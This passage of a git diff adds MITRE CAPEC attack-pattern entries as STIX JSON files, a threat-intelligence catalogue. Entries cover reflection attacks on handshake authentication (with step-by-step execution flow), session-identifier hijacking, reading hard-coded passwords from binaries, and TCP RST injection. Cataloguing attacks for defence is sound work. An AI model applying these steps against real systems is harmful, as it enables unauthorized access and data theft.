"http://en.wikipedia.org/wiki/Disassembler" + } + ], + "id": "attack-pattern--2231936f-0dda-4736-a089-9e734231907c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Read Sensitive Constants Within an Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security" + ], + "x_capec_extended_description": "\n One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.\n Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.\n ", + "x_capec_prerequisites": [ + "Access to a binary or executable such that it can be analyzed by various utilities." + ], + "x_capec_resources_required": [ + "Binary analysis programs such as 'strings' or 'grep', or hex editors." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json new file mode 100644 index 0000000000000000000000000000000000000000..2db24c3d5179be76feb0b20cd5f45c96d6e04115 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json @@ -0,0 +1,76 @@ +{ + "id": "bundle--7a7d8b5d-4cb9-4b8b-8079-143f88ac2cb1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json new file mode 100644 index 0000000000000000000000000000000000000000..482bd98eda15d321a8cd272720f91f32f564b2c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json @@ -0,0 +1,73 @@ +{ + "id": "bundle--6ebec20a-c19d-4560-9dc4-3e46d2bafe39", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json new file mode 100644 index 0000000000000000000000000000000000000000..ac361da87a473fd3f38cb3a7ec4b0c195fdf72ac --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json @@ -0,0 +1,141 @@ +{ + "id": "bundle--a4b01938-3676-4511-af64-8c3cb8ceaa9a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": "Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

    2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

    2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." + ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a.json new file mode 100644 index 0000000000000000000000000000000000000000..6817fa991d4d90da84c2ebe6d280dda2b20c399c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a.json @@ -0,0 +1,35 @@ +{ + "id": "bundle--b104b8dc-a0cb-4fda-91a6-7b1a24ddeb57", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-405", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/405.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering via Research", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c.json new file mode 100644 index 0000000000000000000000000000000000000000..308bdd3a734dc9a0d6d60e7f3f353455681f52f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--36c6ed74-6ecf-4104-8d39-25654d7f301f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-266", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/266.html" + } + ], + "id": "attack-pattern--d946bee3-57a8-4f1b-9c58-1c537519618c", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Manipulate Canonicalization", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64.json new file mode 100644 index 0000000000000000000000000000000000000000..c8a31ce7fb3ba7d4974d700aecf3eb6f59b923fd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64.json @@ -0,0 +1,49 @@ +{ + "id": "bundle--002619a4-13fa-4bc3-b0e1-cf1b45639455", + "objects": [ + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-596", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/596.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TCP RST Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "An On/In Path Device" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json new file mode 100644 index 0000000000000000000000000000000000000000..8fee22e871c424e504b3755fd37c0798714f4b16 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json @@ -0,0 +1,67 @@ +{ + "id": "bundle--b56d9381-3749-4333-b1fc-5c00b43d30d7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.", + "external_references": [ + { + "external_id": "CAPEC-290", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Enumerate Mail Exchange (MX) Records", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The adversary requires access to a DNS server that will return the MX records for a network." + ], + "x_capec_resources_required": [ + "A command-line utility or other application capable of sending requests to the DNS server is necessary." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json new file mode 100644 index 0000000000000000000000000000000000000000..4a85a44fda8a6ed487199bfd59132d58f3fe08e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json @@ -0,0 +1,74 @@ +{ + "id": "bundle--a221e613-6ca7-4ffb-81e6-41739cfc3a1d", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ", + "external_references": [ + { + "external_id": "CAPEC-677", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/677.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ", + "external_id": "REF-685", + "source_name": "reference_from_CAPEC", + "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild" + } + ], + "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Server Motherboard Compromise", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json new file mode 100644 index 0000000000000000000000000000000000000000..9f10c45f78c9464d3b2fb0dfe605c440acafa339 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json @@ -0,0 +1,70 @@ +{ + "id": "bundle--cf567496-29b6-4dcb-a6ac-676dbf7669b6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "external_id": "CAPEC-546", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "external_id": "REF-461", + "source_name": "reference_from_CAPEC", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf" + } + ], + "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Incomplete Data Deletion in a Multi-Tenant Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse 